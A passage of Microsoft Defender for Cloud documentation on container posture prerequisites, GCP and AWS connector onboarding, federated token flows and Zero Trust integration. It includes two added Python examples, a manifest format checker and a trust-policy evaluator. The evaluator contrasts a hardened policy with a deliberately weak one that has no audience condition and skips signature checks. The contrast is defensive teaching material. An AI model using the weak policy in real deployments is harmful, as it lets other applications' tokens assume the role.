Defender for Containers relies on the Defender agent for several features. The Defender agent doesn't support the ability to ingest data through Private Link. You can disable public access for ingestion, so that only machines that are configured to send traffic through Azure Monitor Private Link can send data to that workspace. You can configure a private link by navigating to your workspace > Network Isolation and setting the Virtual networks access configurations to No.

[Screenshot: Virtual networks access configuration, with the option "Accept queries from public networks not connected through a Private Link Scope" set to Yes or No]

Allowing data ingestion to occur only through Private Link Scope on your workspace Network Isolation settings can result in communication failures and partial coverage of the Defender for Containers feature set.

Learn how to use Azure Private Link to connect networks to Azure Monitor.


Outbound proxy support


Outbound proxy without authentication and outbound proxy with basic authentication are supported. Outbound proxy that expects trusted certificates is currently not supported.


Next steps 


• Learn how Defender for Cloud collects data using the Log Analytics Agent.
• Learn how Defender for Cloud manages and safeguards data.
• Review the platforms that support Defender for Cloud.


Support and prerequisites for agentless containers posture


Article • 08/03/2023


All of the agentless container capabilities are available as part of the Defender Cloud 
Security Posture Management plan. 


Review the requirements on this page before setting up agentless containers posture in 
Microsoft Defender for Cloud. 


Availability 


Aspect           Details 
Release state:   General Availability (GA) 
Pricing:         Requires Defender Cloud Security Posture Management (CSPM) and is billed as 
                 shown on the pricing page 
Clouds:          © Azure Commercial clouds 
                 * Azure Government 
                 * Microsoft Azure operated by 21Vianet 
                 * Connected AWS accounts 
                 * Connected GCP accounts 
Permissions:     You need to have access as a: 
                 - Subscription Owner, or 
                 - User Access Admin and Security Admin for the Azure subscription used 
                   for onboarding 


Registries and images - powered by MDVM 


Aspect                      Details 
Registries and images       Supported 
                            • ACR registries 
                            • ACR registries protected with Azure Private Link (private registries 
                              require access to Trusted Services) 
                            • Container images in Docker V2 format 

                            Unsupported 
                            • Super-minimalist images such as Docker scratch images 
                            • "Distroless" images that only contain an application and its runtime 
                              dependencies without a package manager, shell, or OS (currently 
                              unsupported) 
                            • Images in the Open Container Initiative (OCI) image format 
                              specification 
                            • Windows images 

OS packages                 Supported 
                            • Alpine Linux 3.12-3.16 
                            • Red Hat Enterprise Linux 6-9 
                            • CentOS 6-9 
                            • Oracle Linux 6-9 
                            • Amazon Linux 1, 2 
                            • openSUSE Leap, openSUSE Tumbleweed 
                            • SUSE Enterprise Linux 11-15 
                            • Debian GNU/Linux 7-12 
                            • Ubuntu 12.04-22.04 
                            • Fedora 31-37 
                            • Mariner 1-2 

Language-specific packages  Supported 
                            • Python 
                            • Node.js 
                            • .NET 
                            • Java 
                            • Go 
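Two of the unsupported cases in the table, OCI-format images and Windows images, can be spotted from the image manifest before you rely on the scan results. The following is an added example (not code from the Defender for Cloud documentation or from MDVM): it classifies a manifest by its media type and, for a manifest list, by the platform of each entry. The manifests are constructed for the example; real ones come from `GET /v2/<name>/manifests/<reference>` on the registry or from a tool such as `crane manifest`. Scratch and distroless images cannot be told apart this way because the manifest does not say whether a package manager is present.

```python
"""Added example (not from the Defender for Cloud docs): decide, from an image
manifest fetched from a registry, whether the image is in the format the
agentless registry scan supports (Docker V2) or in one the page lists as
unsupported (OCI image format, Windows images).  The manifests below are
constructed for the example."""
import json

# Media types from the Docker Image Manifest V2 and OCI image specifications.
DOCKER_MANIFEST = "application/vnd.docker.distribution.manifest.v2+json"
DOCKER_LIST = "application/vnd.docker.distribution.manifest.list.v2+json"
OCI_MANIFEST = "application/vnd.oci.image.manifest.v1+json"
OCI_INDEX = "application/vnd.oci.image.index.v1+json"


def classify_manifest(manifest_json: str, content_type: str = "") -> dict:
    """Return {"scannable": bool, "reasons": [...]} for one manifest.

    `content_type` is the Content-Type header the registry returned; when the
    manifest body carries its own mediaType field that takes precedence."""
    m = json.loads(manifest_json)
    media_type = m.get("mediaType") or content_type
    reasons = []

    if media_type in (OCI_MANIFEST, OCI_INDEX):
        reasons.append("OCI image format is not supported by the agentless scan")
    elif media_type not in (DOCKER_MANIFEST, DOCKER_LIST):
        reasons.append(f"unrecognised manifest media type {media_type!r}")

    # A manifest list names the platform of each entry; any Windows entry is an
    # unsupported image.  A single manifest has no platform field, so for those
    # the OS has to be read from the image config blob (not done here).
    for entry in m.get("manifests", []):
        platform = entry.get("platform", {})
        if platform.get("os") == "windows":
            reasons.append(f"windows platform entry {entry.get('digest', '?')}")
        if entry.get("mediaType") == OCI_MANIFEST:
            reasons.append(f"OCI entry {entry.get('digest', '?')}")

    return {"scannable": not reasons, "reasons": reasons}


# Constructed manifests for the three cases the table distinguishes.
LINUX_DOCKER_V2 = json.dumps({
    "schemaVersion": 2, "mediaType": DOCKER_MANIFEST,
    "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
               "digest": "sha256:" + "a" * 64, "size": 1500},
    "layers": [],
})
OCI_IMAGE = json.dumps({
    "schemaVersion": 2, "mediaType": OCI_MANIFEST,
    "config": {"mediaType": "application/vnd.oci.image.config.v1+json",
               "digest": "sha256:" + "b" * 64, "size": 1500},
    "layers": [],
})
MIXED_LIST = json.dumps({
    "schemaVersion": 2, "mediaType": DOCKER_LIST,
    "manifests": [
        {"mediaType": DOCKER_MANIFEST, "digest": "sha256:" + "c" * 64, "size": 900,
         "platform": {"os": "linux", "architecture": "amd64"}},
        {"mediaType": DOCKER_MANIFEST, "digest": "sha256:" + "d" * 64, "size": 900,
         "platform": {"os": "windows", "architecture": "amd64",
                      "os.version": "10.0.20348.1970"}},
    ],
})

if __name__ == "__main__":
    for name, body in [("linux docker v2", LINUX_DOCKER_V2),
                       ("oci image", OCI_IMAGE),
                       ("mixed manifest list", MIXED_LIST)]:
        print(name, classify_manifest(body))
```

Run it over every tag in a registry and the images it reports as not scannable are the ones for which "no findings" means "not scanned", not "clean".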


Prerequisites 


You need to have a Defender CSPM plan enabled. There's no dependency on Defender 
for Containers. 


This feature uses trusted access. Learn more about AKS trusted access prerequisites. 


Are you using an updated version of AKS? 

Learn more about supported Kubernetes versions in Azure Kubernetes Service (AKS). 
Are attack paths triggered on workloads that are running 
on Azure Container Instances? 


Attack paths are currently not triggered for workloads running on Azure Container 
Instances. 


Next steps 


Learn how to enable agentless containers. 


Defender for Cloud for your multicloud 
environment 


Microsoft Defender for Cloud connects to your multicloud environments with agentless, 
API-based methods for CSPM insight. You can leverage Azure Arc to use Defender plans 
for CWP. 


About multicloud deployments 


OVERVIEW 
Overview of hybrid and multicloud 
Why protect multicloud resources with Microsoft Defender for Cloud 


Get started planning multicloud security 


HOW-TO GUIDE 
Connect your non-Azure machines to Defender for Cloud 
Enable enhanced security for your multicloud resources 


REFERENCE 
Troubleshooting multicloud connectors 


Defend Amazon AWS resources 


OVERVIEW 
Protect your AWS virtual machines with Defender for Servers 
Supported features for AWS virtual machines 
Protect your AWS EKS containers with Defender for Containers 
Supported features for AWS EKS containers 


GET STARTED 
Connect your AWS accounts to Microsoft Defender for Cloud 
Enable Defender for Containers for your AWS EKS containers 
Enable Defender for SQL servers for your AWS SQL databases 


HOW-TO GUIDE 
Secure your AWS management ports with just-in-time access 
Protect your AWS virtual machines with Microsoft Defender for Endpoint 
Harden your AWS Docker hosts 
Monitor file changes that might indicate an attack 
Scan your AWS virtual machines for vulnerabilities 


VIDEO 
How to connect AWS to Microsoft Defender for Cloud 


REFERENCE 
Security recommendations for AWS resources 


Defend Google GCP resources 


OVERVIEW 
Protect your GCP virtual machines with Defender for Servers 
Supported features for GCP virtual machines 
Protect your GCP GKE containers with Defender for Containers 
Supported features for GCP GKE containers 


GET STARTED 
Connect your GCP accounts to Microsoft Defender for Cloud 
Enable Defender for Containers for your GCP GKE containers 
Enable Defender for SQL servers for your GCP SQL databases 


VIDEO 
How to connect GCP to Microsoft Defender for Cloud 


Defender for Cloud's GCP connector 


Article e 06/29/2023 


The Microsoft Defender for Cloud GCP (Google Cloud Platform) connector is a feature 
that allows an organization to extend its cloud security posture management to their 
Google Cloud environments. 


The GCP connector allows organizations to use Microsoft Defender for Cloud to monitor 
and assess the security state of their Google Cloud resources. The connector allows 
organizations to use Microsoft Defender for Cloud to apply security policies and receive 
security recommendations for their Google Cloud resources. 


The GCP connector allows for continuous monitoring of Google Cloud resources for 
security risks, vulnerabilities, and misconfigurations. It also provides automated 
remediation capabilities to address identified risks and compliance issues. Additionally, 
it allows organizations to use the Microsoft Defender for Cloud's integrated threat 
protection capabilities to protect their Google Cloud resources from threats. 


GCP authorization design 


The authentication process between Microsoft Defender for Cloud and GCP is a 
federated authentication process. 


When you onboard to Defender for Cloud, the GCloud template is used to create the 
following resources as part of the authentication process: 


• Workload identity pool and providers 
• Service accounts and policy bindings 


The authentication process works as follows: 


[Diagram: Defender for Cloud's CSPM first-party Azure AD application, in the Microsoft tenant, exchanges a Microsoft Entra token at Google's Security Token Service against the workload identity pool in the customer's GCP project, then uses the returned token to impersonate the service account that the gcloud script created when the customer onboarded the project.] 


(1) - Microsoft Defender for Cloud's CSPM service acquires a Microsoft Entra token. The 
token is signed by Microsoft Entra ID using the RS256 algorithm and is valid for 1 hour. 


(2) - The Microsoft Entra token is exchanged for a Google STS token. 


(3) - The Microsoft Entra token is sent to Google's STS, which validates it against the 
workload identity provider. Audience validation then occurs and the token's signature is 
verified. A Google STS token is then returned to Defender for Cloud's CSPM service. 


(4) - Defender for Cloud's CSPM service uses the Google STS token to impersonate the 
service account. Defender for Cloud's CSPM receives service account credentials that are 
used to scan the project. 


What happens when you onboard a single 
project 

There are four parts to the onboarding process that take place when you create the 
security connection between your GCP project and Microsoft Defender for Cloud. 
Organization details 


In the first section, you need to add the basic properties of the connection between your 
GCP project and Defender for Cloud. 


[Screenshot: Create GCP connector > Project details. Fields: Connector name, Onboard (Organization / Single project), Subscription, Resource group, Location, GCP project number, GCP project Id.] 


Here you name your connector and select a subscription and resource group, which are used 
to create an ARM template resource called a security connector. The security 
connector is a configuration resource that holds the project's settings. 


You also select a location and add the GCP project number and project ID of the project 
you're onboarding. 


Select plans 


After entering your project's details, you'll then be able to select which plans to 
enable. 


[Screenshot: Create GCP connector > Select plans, listing Cloud Security Posture Management (CSPM) and the other Defender plans.] 


From here, you can decide which resources you want to protect based on the security 
value you want to receive. 


Configure access 


Once you've selected the plans you want to enable and the resources you want to 
protect, you have to configure access between Defender for Cloud and your GCP project. 


[Screenshot: Create GCP connector > Configure access. Step 1, "Copy script to GCP Cloud Shell": a Cloud Shell template to configure access on the GCP side has been created according to the plans selected in the previous tab, with a Copy button and a link to GCP Cloud Shell. Step 2, "Edit service account email address or identity provider": the service account email addresses and identity providers created on the GCP side are auto-filled per selected plan (identity federation pool name "microsoft defender for cloud"; sections for Cloud Security Posture Management, Servers, Databases, Containers). If you didn't change the names on the GCP side, select "Review and generate"; if you did, update them here first.] 


In this step, you can find the GCloud script that needs to be run on the GCP project that 
is going to be onboarded. The GCloud script is generated based on the plans you selected 
to onboard. 


The GCloud script creates all of the required resources on your GCP environment so that 
Defender for Cloud can operate and provide the following security values: 


• Workload identity pool 
• Workload identity provider (per plan) 
• Service accounts 
• Project level policy bindings (the service account has access only to the specific 
  project) 


Review and generate 


The final step for onboarding is to review all of your selections and to create the 
connector. 


[Screenshot: Create GCP connector > Review and generate. Account details: display name, subscription, resource group, region, organization id, management project id, identity federation pool id. Selected plans: Cloud Security Posture Management (Defender CSPM), Servers, Databases, Containers. Configure access, listing the per-plan identities created in the project (project number shown as 0000000001): 
  CSPM service account email: microsoft-defender-cspm@0000000001.iam.gserviceaccount.com, identity provider id: cspm 
  Servers service account email: microsoft-defender-for-servers@0000000001.iam.gserviceaccount.com, identity provider: defender-for-servers 
  Databases Arc auto provisioning service account email: microsoft-databases-arc-ap@0000000001.iam.gserviceaccount.com, identity provider: defender-for-databases-arc-ap 
  Containers service account email, identity provider id: containers 
  Containers data collection service account email, identity provider id: containers-streams] 


What happens when you onboard an 
organization 


Similar to onboarding a single project, when onboarding a GCP organization, Defender 
for Cloud creates a security connector for each project under the organization (unless 
specific projects were excluded). 


Organization details 


In the first section, you need to add the basic properties of the connection between your 
GCP organization and Defender for Cloud. 


[Screenshot: Create GCP connector > Organization details. Fields: Connector name, Onboard (Organization selected), Subscription, Resource group, Location, Organization id, Excluded project numbers, Excluded folder ids.] 


Here you name your connector, select a subscription and resource group that is used to 
create an ARM template resource that is called security connector. The security 
connector represents a configuration resource that holds the projects settings. 


You also select a location and add the organization ID for your project. 


When you onboard an organization, you can also choose to exclude project numbers 
and folder IDs. 


Select plans 


After entering your organization's details, you'll then be able to select which plans to 
enable. 


[Screenshot: Create GCP connector > Select plans.] 


From here, you can decide which resources you want to protect based on the security 
value you want to receive. 


Configure access 


Once you've selected the plans you want to enable and the resources you want to 
protect, you have to configure access between Defender for Cloud and your GCP organization. 


[Screenshot: Create GCP connector > Configure access for an organization. Step 1, "Copy script to GCP Cloud Shell": a Cloud Shell template to configure access on the GCP side has been created according to the plans selected in the previous tab; running it creates a management project and an organization custom role to onboard the organization and enable auto-provisioning of future projects. Step 2, "Management project details": either let the script create a dedicated billable GCP project automatically, or provide the project number and project id (shown as mdc-mgmt-proj-0000001), the identity federation pool name ("microsoft defender for cloud"), the service account email address and the identity provider ("auto-provisioner") from the gcloud script output. Step 3, "Edit service account email address or identity provider", per plan: Cloud Security Posture Management, Servers, Databases, Containers.] 


When you onboard an organization, there's a section that includes management project 
details. Similar to other GCP projects, the organization is also considered a project and is 
utilized by Defender for Cloud to create all of the required resources needed to connect 
the organization to Defender for Cloud. 


In the management project details section, you have the choice of: 


• Dedicating a management project to Defender for Cloud, created as part of the GCloud 
  script. 
• Providing the details of an already existing project to be used as the management 
  project with Defender for Cloud. 


You need to decide which option is best for your organization's architecture. We 
recommend creating a dedicated project for Defender for Cloud. 


The GCloud script is generated based on the plans you selected to onboard. The script 
creates all of the required resources on your GCP environment so that Defender for 
Cloud can operate and provide the following security benefits: 


• Workload identity pool 
• Workload identity provider for each plan 
• Custom role to grant Defender for Cloud access to discover and get the projects 
  under the onboarded organization 
• A service account for each plan 
• A service account for the autoprovisioning service 
• Organization level policy bindings for each service account 
• API enablement(s) at the management project level 


Some of the APIs aren't in direct use with the management project. Instead, the APIs 
authenticate through this project and use one of the APIs from another project. The 
API must be enabled on the management project. 


Review and generate 


The final step for onboarding is to review all of your selections and to create the 
connector. 


[Screenshot: Create GCP connector > Review and generate for an organization. Account details: display name, subscription, resource group, region, organization id, management project id (mdc-mgmt-proj-0000001), identity federation pool id, management project number. Selected plans: Cloud Security Posture Management (Defender CSPM), Servers, Databases, Containers. Configure access, listing the per-plan identities created in the management project: 
  CSPM service account email: microsoft-defender-cspm@mdc-mgmt-proj-0000001.iam.gserviceaccount.com, identity provider id: cspm 
  Servers service account email: microsoft-defender-for-servers@mdc-mgmt-proj-0000001.iam.gserviceaccount.com, identity provider: defender-for-servers 
  Databases Arc auto provisioning service account email: microsoft-databases-arc-ap@mdc-mgmt-proj-0000001.iam.gserviceaccount.com, identity provider: defender-for-databases-arc-ap 
  Containers service account email: microsoft-defender-containers@mdc-mgmt-proj-0000001.iam.gserviceaccount.com, identity provider id: containers 
  Containers data collection service account email: ms-defender-containers-stream@mdc-mgmt-proj-0000001.iam.gserviceaccount.com, identity provider id: containers-streams 
  Service account unique numeric ID] 


Next steps 


Connect your GCP projects to Microsoft Defender for Cloud 


Defender for Cloud's AWS connector 


Article e 10/11/2023 


To protect your AWS-based resources, you must connect your AWS account using the 
built-in connector. The connector provides an agentless connection to your AWS 
account that you can extend with Defender for Cloud's Defender plans to secure your 
AWS resources: 


• Cloud Security Posture Management (CSPM) assesses your AWS resources 
  according to AWS-specific security recommendations and reflects your security 
  posture in your secure score. The asset inventory gives you one place to see all of 
  your protected AWS resources. The regulatory compliance dashboard shows your 
  compliance with built-in standards specific to AWS, including AWS CIS, AWS PCI 
  DSS, and AWS Foundational Security Best Practices. 

• Microsoft Defender for Servers brings threat detection and advanced defenses to 
  supported Windows and Linux EC2 instances. 

• Microsoft Defender for Containers brings threat detection and advanced defenses 
  to supported Amazon EKS clusters. 

• Microsoft Defender for SQL brings threat detection and advanced defenses to 
  your SQL Servers running on AWS EC2 and AWS RDS Custom for SQL Server. 


The retired Classic cloud connector - Requires you to configure your AWS account to 
create a user that Defender for Cloud can use to connect to your AWS environment. The 
classic connector is only available to customers who have previously connected AWS 
accounts with it. 


Note 


If you are connecting an AWS account that was previously connected with the 
classic connector, you must remove it first. Using an AWS account that is 
connected by both the classic and native connectors can produce duplicate 
recommendations. 


AWS authentication process 


Federated authentication is used between Microsoft Defender for Cloud and AWS. All of 
the resources related to the authentication are created as a part of the CloudFormation 
template deployment, including: 


• An identity provider (OpenID Connect) 
• Identity and Access Management (IAM) roles with a federated principal (connected 
  to the identity provider) 


The architecture of the authentication process across clouds is as follows: 


[Diagram: Microsoft Defender for Cloud (MDC) in the Azure cloud obtains a token from Azure Active Directory (Azure AD), presents it to AWS STS, which checks it against the IAM identity provider and the role's trust relationship, and returns temporary security credentials for the role.] 


1. Microsoft Defender for Cloud CSPM service acquires a Microsoft Entra token with a 
   validity lifetime of 1 hour that is signed by Microsoft Entra ID using the RS256 
   algorithm. 

2. The Microsoft Entra token is exchanged for AWS short-lived credentials: Defender 
   for Cloud's CSPM service assumes the CSPM IAM role (assumed with web identity). 

3. Since the principal of the role is a federated identity as defined in the trust 
   relationship policy, the AWS identity provider validates the Microsoft Entra token 
   against Microsoft Entra ID through a process that includes: 

   • audience validation 
   • verification of the token's signature 
   • the identity provider's certificate thumbprint 

4. The Microsoft Defender for Cloud CSPM role is assumed only after the validation 
   conditions defined in the trust relationship have been met. The conditions defined 
   at the role level are used for validation within AWS and allow only the Microsoft 
   Defender for Cloud CSPM application (the validated audience) access to the specific 
   role, and not any other Microsoft token. 

5. After the Microsoft Entra token is validated by the AWS identity provider, AWS 
   STS exchanges the token for AWS short-lived credentials, which the CSPM service 
   uses to scan the AWS account. 
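Step 3 of the GCP flow above and steps 3-4 of the AWS flow hinge on the same role-level check: the token's issuer must be the federated principal the role trusts, and its audience must be the CSPM application, otherwise any token the same Microsoft tenant issues could assume the role. The following is an added example, not Microsoft's code and not the CloudFormation template's actual policy: it evaluates a role trust policy of the shape AWS uses for `AssumeRoleWithWebIdentity` against a decoded token, with a weak policy (issuer only) beside the hardened one (issuer plus audience). The tenant, application and account IDs are placeholders, the tokens are constructed, and RS256 signature verification against the issuer's published keys is deliberately left out so the block runs offline; a real STS performs it before anything else.

```python
"""Added example (not from the Defender for Cloud docs): the role-level check
an STS performs before handing out credentials for a federated token, modelled
on the AWS trust-relationship policy that AssumeRoleWithWebIdentity evaluates.
Only the claim conditions the page describes are evaluated (issuer must be the
federated principal, audience pinned to one application, token not expired);
RS256 signature verification is left out.  Tenant, application and account IDs
are placeholders and the tokens are constructed for the example."""
import base64
import json
import time
from typing import Optional, Tuple

TENANT_ID = "00000000-0000-0000-0000-000000000000"     # placeholder Microsoft tenant
ISSUER_HOST = f"sts.windows.net/{TENANT_ID}/"           # placeholder issuer host
ISSUER = "https://" + ISSUER_HOST
MDC_APP_ID = "11111111-1111-1111-1111-111111111111"     # placeholder CSPM application id
ACCOUNT_ID = "123456789012"                              # placeholder AWS account
# The OIDC identity provider the template creates; its ARN ends with the issuer
# host, which is how the federated principal is tied to one issuer.
PROVIDER_ARN = f"arn:aws:iam::{ACCOUNT_ID}:oidc-provider/{ISSUER_HOST}"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_token(aud: str, sub: str, lifetime_s: int = 3600) -> str:
    """Build a JWT carrying the claims the flow relies on.  The RS256 header is
    kept for realism but the signature segment is empty: nothing here verifies it."""
    now = int(time.time())
    header = {"alg": "RS256", "typ": "JWT"}
    payload = {"iss": ISSUER, "aud": aud, "sub": sub, "iat": now, "exp": now + lifetime_s}
    return ".".join([_b64url(json.dumps(header).encode()),
                     _b64url(json.dumps(payload).encode()), ""])


def decode_claims(token: str) -> dict:
    """Decode the payload segment (no signature check, see module docstring)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def evaluate_trust_policy(policy: dict, token: str,
                          now: Optional[int] = None) -> Tuple[bool, str]:
    """Emulate the STS decision: the role may be assumed only if an Allow
    statement names the token's issuer as federated principal and every
    StringEquals condition (keyed "<issuer host>:<claim>") matches the token."""
    claims = decode_claims(token)
    now = int(time.time()) if now is None else now
    if claims.get("exp", 0) <= now:
        return False, "token expired"
    issuer_host = claims["iss"][len("https://"):]
    expected_principal = f"arn:aws:iam::{ACCOUNT_ID}:oidc-provider/{issuer_host}"
    for st in policy.get("Statement", []):
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if st.get("Effect") != "Allow" or "sts:AssumeRoleWithWebIdentity" not in actions:
            continue
        if st.get("Principal", {}).get("Federated") != expected_principal:
            continue
        conds = st.get("Condition", {}).get("StringEquals", {})
        satisfied = True
        for key, value in conds.items():
            prefix, claim = key.rsplit(":", 1)
            # Fail closed: a condition on another provider's keys never matches.
            if prefix != issuer_host or claims.get(claim) != value:
                satisfied = False
        if satisfied:
            return True, "allowed by statement " + st.get("Sid", "<no Sid>")
    return False, "no trust statement matched"


# Weak trust policy: any token the tenant's issuer signs can assume the role,
# whichever Microsoft application it was minted for.
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Sid": "AnyTokenFromTenant", "Effect": "Allow",
    "Principal": {"Federated": PROVIDER_ARN},
    "Action": "sts:AssumeRoleWithWebIdentity"}]}

# Hardened trust policy: the audience condition pins the role to the CSPM app,
# the "validated audience ... not any other Microsoft token" the page describes.
HARDENED_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Sid": "OnlyDefenderCspm", "Effect": "Allow",
    "Principal": {"Federated": PROVIDER_ARN},
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {"StringEquals": {f"{ISSUER_HOST}:aud": MDC_APP_ID}}}]}

CSPM_TOKEN = make_token(aud=MDC_APP_ID, sub="defender-cspm")          # constructed
OTHER_TOKEN = make_token(aud="22222222-2222-2222-2222-222222222222",  # constructed:
                         sub="some-other-app")                        # same issuer, other app

if __name__ == "__main__":
    for name, policy in [("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)]:
        for label, tok in [("cspm token", CSPM_TOKEN), ("other-app token", OTHER_TOKEN)]:
            print(f"{name:8} {label:16} -> {evaluate_trust_policy(policy, tok)}")
```

The same distinction exists on the GCP side: the workload identity provider's allowed audiences and attribute condition play the role of the `:aud` condition here, and a provider that accepts any audience from the issuer is the GCP equivalent of `WEAK_POLICY`.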


Native connector plan requirements 


Each plan has its own requirements for the native connector. 


Defender for Containers plan 


• At least one Amazon EKS cluster with permission to access the EKS K8s API 
  server. If you need to create a new EKS cluster, follow the instructions in Getting 
  started with Amazon EKS - eksctl. 

• The resource capacity to create a new SQS queue, Kinesis Data Firehose delivery 
  stream, and S3 bucket in the cluster's region. 


Defender for SQL plan 


• Microsoft Defender for SQL enabled on your subscription. Learn how to enable 
  protection on all of your databases. 

• An active AWS account, with EC2 instances running SQL Server or RDS Custom for 
  SQL Server. 

• Azure Arc for servers installed on your EC2 instances/RDS Custom for SQL Server. 

  ○ (Recommended) Use the auto provisioning process to install Azure Arc on all of 
    your existing and future EC2 instances. 

    Auto provisioning is managed by AWS Systems Manager (SSM) using the SSM 
    agent. Some Amazon Machine Images (AMIs) already have the SSM agent 
    preinstalled; these are listed in AMIs with SSM Agent preinstalled. If your EC2 
    instances don't have the SSM Agent, you need to install it using the relevant 
    instructions from Amazon: 

    ○ Install SSM Agent for a hybrid environment (Windows) 

    Note 

    To enable the Azure Arc auto-provisioning, you'll need Owner permission 
    on the relevant Azure subscription. 

• Other extensions should be enabled on the Arc-connected machines: 
  ○ Microsoft Defender for Endpoint 
  ○ VA solution (TVM/Qualys) 
  ○ Log Analytics (LA) agent on Arc machines or Azure Monitor agent (AMA) 

  Make sure the selected LA workspace has the security solution installed. The LA 
  agent and AMA are currently configured at the subscription level. All of your 
  AWS accounts and GCP projects under the same subscription inherit the 
  subscription settings for the LA agent and AMA. 


Learn more about monitoring components for Defender for Cloud. 


Defender for Servers plan 


• Microsoft Defender for Servers enabled on your subscription. Learn how to enable 
  plans. 

• An active AWS account, with EC2 instances. 

• Azure Arc for servers installed on your EC2 instances. 

  ○ (Recommended) Use the auto provisioning process to install Azure Arc on all of 
    your existing and future EC2 instances. 

    Auto provisioning is managed by AWS Systems Manager (SSM) using the SSM 
    agent. Some Amazon Machine Images (AMIs) already have the SSM agent 
    preinstalled; these are listed in AMIs with SSM Agent preinstalled. If your EC2 
    instances don't have the SSM Agent, you need to install it using the relevant 
    instructions from Amazon: 

    ○ Install SSM Agent for a hybrid environment (Windows) 
    ○ Install SSM Agent for a hybrid environment (Linux) 

    Note 

    To enable the Azure Arc auto-provisioning, you'll need Owner permission 
    on the relevant Azure subscription. 

  ○ If you want to manually install Azure Arc on your existing and future EC2 
    instances, use the "EC2 instances should be connected to Azure Arc" 
    recommendation to identify instances that don't have Azure Arc installed. 

• Other extensions should be enabled on the Arc-connected machines: 
  ○ Microsoft Defender for Endpoint 
  ○ VA solution (TVM/Qualys) 
  ○ Log Analytics (LA) agent on Arc machines or Azure Monitor agent (AMA) 

  Make sure the selected LA workspace has the security solution installed. The LA 
  agent and AMA are currently configured at the subscription level. All of your 
  AWS accounts and GCP projects under the same subscription inherit the 
  subscription settings for the LA agent and AMA. 


Learn more about monitoring components for Defender for Cloud. 


Note 


Defender for Servers assigns tags to your AWS resources to manage the 
auto-provisioning process. You must have these tags properly assigned to 
your resources so that Defender for Cloud can manage your resources: 
AccountId, Cloud, InstanceId, MDFCSecurityConnector 


Learn more 


You can check out the following blogs: 


• Ignite 2021: Microsoft Defender for Cloud news 
• Security posture management and server protection for AWS and GCP 


Next steps 


Connecting your AWS account is part of the multicloud experience available in Microsoft 
Defender for Cloud. 


• Protect all of your resources with Defender for Cloud 


Zero Trust infrastructure and 
integrations 


Article e 03/15/2023 


Zero Trust is a security strategy for designing and implementing the following sets of 
security principles: 


• Verify explicitly: Always authenticate and authorize based on all available data points. 
• Use least privilege access: Limit user access with Just-In-Time and Just-Enough-Access 
  (JIT/JEA), risk-based adaptive policies, and data protection. 
• Assume breach: Minimize blast radius and segment access. Verify end-to-end encryption 
  and use analytics to get visibility, drive threat detection, and improve defenses. 


Infrastructure comprises the hardware, software, micro-services, networking 
infrastructure, and facilities required to support IT services for an organization. Zero 
Trust infrastructure solutions assess, monitor, and prevent security threats to these 
services. 


Zero Trust infrastructure solutions support the principles of Zero Trust by ensuring that 
access to infrastructure resources is verified explicitly, access is granted using principles 
of least privilege access, and mechanisms are in place that assume breach and look for 
and remediate security threats in infrastructure. 


This guidance is for software providers and technology partners who want to enhance 
their infrastructure security solutions by integrating with Microsoft products. 


Zero Trust integration for Infrastructure guide 


This integration guide includes strategy and instructions for integrating with Microsoft 
Defender for Cloud and its integrated cloud workload protection platform (CWPP), 
Microsoft Defender for Cloud. 


The guidance includes integrations with the most popular Security Information and 
Event Management (SIEM), Security Orchestration Automated Response (SOAR), 
Endpoint Detection and Response (EDR), and IT Service Management (ITSM) solutions. 


Zero Trust and Defender for Cloud 


Our Zero Trust infrastructure deployment guidance provides the key stages of the Zero Trust 
strategy for infrastructure, which are: 


1. Assess compliance with chosen standards and policies 
2. Harden configuration wherever gaps are found 
3. Employ other hardening tools such as just-in-time (JIT) VM access 
4. Set up threat detection and protections 
5. Automatically block and flag risky behavior and take protective actions 


There's a clear mapping from the goals we've described in the infrastructure 
deployment guidance to the core aspects of Defender for Cloud. 


Zero Trust goal: Assess compliance 
Defender for Cloud feature: In Defender for Cloud, every subscription automatically has the 
Microsoft cloud security benchmark (MCSB) security initiative assigned. Using the secure score 
tools and the regulatory compliance dashboard you can get a deep understanding of your 
customer's security posture. 


Zero Trust goal: Harden configuration 
Defender for Cloud feature: Review your security recommendations and track your secure score 
improvement over time. You can also prioritize which recommendations to remediate based on 
potential attack paths, by leveraging the attack path feature. 


Zero Trust goal: Employ hardening mechanisms 
Defender for Cloud feature: Least privilege access is one of the three principles of Zero 
Trust. Defender for Cloud can assist you to harden VMs and networks using this principle by 
leveraging features such as: 
• Just-in-time (JIT) virtual machine (VM) access 
• Adaptive network hardening 
• Adaptive application controls 


Zero Trust goal: Set up threat detection 
Defender for Cloud feature: Defender for Cloud offers an integrated cloud workload protection 
platform (CWPP), Microsoft Defender for Cloud. Microsoft Defender for Cloud provides advanced, 
intelligent protection of Azure and hybrid resources and workloads. One of the Microsoft 
Defender plans, Microsoft Defender for Servers, includes a native integration with Microsoft 
Defender for Endpoint. Learn more in Introduction to Microsoft Defender for Cloud. 


Zero Trust goal: Automatically block suspicious behavior 
Defender for Cloud feature: Many of the hardening recommendations in Defender for Cloud offer 
a deny option. This feature lets you prevent the creation of resources that don't satisfy 
defined hardening criteria. Learn more in Prevent misconfigurations with Enforce/Deny 
recommendations. 


Zero Trust goal: Automatically flag suspicious behavior 
Defender for Cloud feature: Microsoft Defender for Cloud's security alerts are triggered by 
advanced detections. Defender for Cloud prioritizes and lists the alerts, along with the 
information needed for you to quickly investigate the problem. Defender for Cloud also 
provides detailed steps to help you remediate attacks. For a full list of the available 
alerts, see Security alerts - a reference guide. 


Protect your Azure PaaS services with Defender for Cloud 


With Defender for Cloud enabled on your subscription, and Microsoft Defender for 
Cloud enabled for all available resource types, you'll have a layer of intelligent threat 
protection - powered by Microsoft Threat Intelligence Z - protecting resources in Azure 
Key Vault, Azure Storage, Azure DNS, and other Azure PaaS services. For a full list, see 
What resource types can Microsoft Defender for Cloud secure?. 


Azure Logic Apps 


Use Azure Logic Apps to build automated scalable workflows, business processes, and 
enterprise orchestrations to integrate your apps and data across cloud services and on- 
premises systems. 


Defender for Cloud's workflow automation feature lets you automate responses to 
Defender for Cloud triggers. 


This is great way to define and respond in an automated, consistent manner when 
